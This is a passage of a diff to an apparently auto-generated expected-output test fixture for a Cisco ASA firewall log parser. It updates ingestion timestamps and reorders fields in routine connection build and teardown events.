"2021-12-09T13:33:41.995632300Z", + "ingested": "2021-12-14T14:38:25.938959082Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", @@ -12030,7 +12030,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995636700Z", + "ingested": "2021-12-14T14:38:25.938959548Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12115,7 +12115,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995641800Z", + "ingested": "2021-12-14T14:38:25.938960028Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -12197,7 +12197,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995648300Z", + "ingested": "2021-12-14T14:38:25.938960499Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", @@ -12276,7 +12276,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995653200Z", + "ingested": "2021-12-14T14:38:25.938960954Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", @@ -12361,7 +12361,7 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-12-09T13:33:41.995657900Z", + "ingested": "2021-12-14T14:38:25.938961507Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", @@ -12385,22 +12385,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -12410,12 +12404,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995661900Z", + "ingested": "2021-12-14T14:38:25.938962304Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", @@ -12429,7 +12426,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -12491,7 +12491,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995666800Z", + "ingested": "2021-12-14T14:38:25.938962768Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12575,7 +12575,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995673100Z", + "ingested": "2021-12-14T14:38:25.938963240Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12660,7 +12660,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995679400Z", + "ingested": "2021-12-14T14:38:25.938963693Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", @@ -12743,7 +12743,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995685600Z", + "ingested": "2021-12-14T14:38:25.938964171Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12828,7 +12828,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995691800Z", + "ingested": "2021-12-14T14:38:25.938964849Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", @@ -12912,7 +12912,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995698Z", + "ingested": "2021-12-14T14:38:25.938965318Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -12995,7 +12995,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995704300Z", + "ingested": "2021-12-14T14:38:25.938965780Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13080,7 +13080,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995710400Z", + "ingested": "2021-12-14T14:38:25.938966272Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", @@ -13162,7 +13162,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995716700Z", + "ingested": "2021-12-14T14:38:25.938966742Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", @@ -13241,7 +13241,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995722900Z", + "ingested": "2021-12-14T14:38:25.938967206Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", @@ -13325,7 +13325,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995729500Z", + "ingested": "2021-12-14T14:38:25.938968382Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13410,7 +13410,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995735900Z", + "ingested": "2021-12-14T14:38:25.938968866Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", @@ -13492,7 +13492,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995742200Z", + "ingested": "2021-12-14T14:38:25.938969321Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", @@ -13571,7 +13571,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995748400Z", + "ingested": "2021-12-14T14:38:25.938969798Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", @@ -13654,7 +13654,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995754600Z", + "ingested": "2021-12-14T14:38:25.938970405Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", @@ -13733,7 +13733,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995760900Z", + "ingested": "2021-12-14T14:38:25.938970935Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", @@ -13816,7 +13816,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995765700Z", + "ingested": "2021-12-14T14:38:25.938971397Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", @@ -13895,7 +13895,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995770800Z", + "ingested": "2021-12-14T14:38:25.938971904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", @@ -13981,7 +13981,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995776400Z", + "ingested": "2021-12-14T14:38:25.938972370Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", @@ -14063,7 +14063,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995782Z", + "ingested": "2021-12-14T14:38:25.938972826Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", @@ -14142,7 +14142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995786300Z", + "ingested": "2021-12-14T14:38:25.938973386Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", @@ -14225,7 +14225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995791200Z", + "ingested": "2021-12-14T14:38:25.938973845Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", @@ -14304,7 +14304,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995797500Z", + "ingested": "2021-12-14T14:38:25.938974314Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", @@ -14390,7 +14390,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995802300Z", + "ingested": "2021-12-14T14:38:25.938974769Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", @@ -14475,7 +14475,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995806900Z", + "ingested": "2021-12-14T14:38:25.938975243Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", @@ -14560,7 +14560,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995810800Z", + "ingested": "2021-12-14T14:38:25.938975729Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", @@ -14642,7 +14642,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995815600Z", + "ingested": "2021-12-14T14:38:25.938976245Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", @@ -14721,7 +14721,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995821900Z", + "ingested": "2021-12-14T14:38:25.938976719Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", @@ -14804,7 +14804,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995828200Z", + "ingested": "2021-12-14T14:38:25.938977179Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", @@ -14883,7 +14883,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995834400Z", + "ingested": "2021-12-14T14:38:25.938977634Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", @@ -14967,7 +14967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995840700Z", + "ingested": "2021-12-14T14:38:25.938978106Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -15052,7 +15052,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995847Z", + "ingested": "2021-12-14T14:38:25.938978664Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -15137,7 +15137,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995853100Z", + "ingested": "2021-12-14T14:38:25.938979233Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", @@ -15219,7 +15219,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995859300Z", + "ingested": "2021-12-14T14:38:25.938979703Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", @@ -15298,7 +15298,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995865500Z", + "ingested": "2021-12-14T14:38:25.938980172Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", @@ -15381,7 +15381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995871800Z", + "ingested": "2021-12-14T14:38:25.938980641Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", @@ -15460,7 +15460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995878100Z", + "ingested": "2021-12-14T14:38:25.938981108Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", @@ -15546,7 +15546,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995884200Z", + "ingested": "2021-12-14T14:38:25.938981658Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", @@ -15631,7 +15631,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995890600Z", + "ingested": "2021-12-14T14:38:25.938982120Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", @@ -15713,7 +15713,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995898500Z", + "ingested": "2021-12-14T14:38:25.938982582Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", @@ -15792,7 +15792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995905200Z", + "ingested": "2021-12-14T14:38:25.938983045Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", @@ -15875,7 +15875,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995911500Z", + "ingested": "2021-12-14T14:38:25.938983518Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", @@ -15954,7 +15954,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995917800Z", + "ingested": "2021-12-14T14:38:25.938983998Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", @@ -15979,22 +15979,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16004,12 +15998,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995924400Z", + "ingested": "2021-12-14T14:38:25.938992257Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", @@ -16023,25 +16020,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16051,12 +16045,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995929600Z", + "ingested": "2021-12-14T14:38:25.938992955Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", @@ -16070,25 +16067,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16098,12 +16092,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995934900Z", + "ingested": "2021-12-14T14:38:25.938993421Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", @@ -16117,25 +16114,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16145,12 +16139,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995941Z", + "ingested": "2021-12-14T14:38:25.938993889Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", @@ -16164,25 +16161,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16192,12 +16186,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995946200Z", + "ingested": "2021-12-14T14:38:25.938994358Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", @@ -16211,25 +16208,22 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16239,12 +16233,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995950600Z", + "ingested": "2021-12-14T14:38:25.938994868Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", @@ -16258,25 +16255,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16286,12 +16280,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995955600Z", + "ingested": "2021-12-14T14:38:25.938995508Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", @@ -16305,25 +16302,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16333,12 +16327,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995961900Z", + "ingested": "2021-12-14T14:38:25.938996095Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", @@ -16352,25 +16349,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16380,12 +16374,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995966600Z", + "ingested": "2021-12-14T14:38:25.938996756Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", @@ -16399,25 +16396,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16427,12 +16421,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995971600Z", + "ingested": "2021-12-14T14:38:25.938997421Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", @@ -16446,25 +16443,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16474,12 +16468,15 @@ "localhost" ] }, + "log": { + 